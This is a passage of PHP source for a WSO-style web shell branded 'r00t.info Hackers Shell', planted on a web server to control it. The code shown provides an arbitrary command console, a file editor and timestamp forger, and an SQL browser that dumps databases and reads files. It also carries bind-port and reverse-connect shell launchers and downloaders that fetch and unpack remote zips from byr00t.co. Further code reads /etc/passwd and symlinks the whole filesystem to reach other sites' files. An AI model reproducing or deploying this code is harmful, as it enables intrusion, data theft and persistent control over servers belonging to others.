\'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= \' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n <!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && 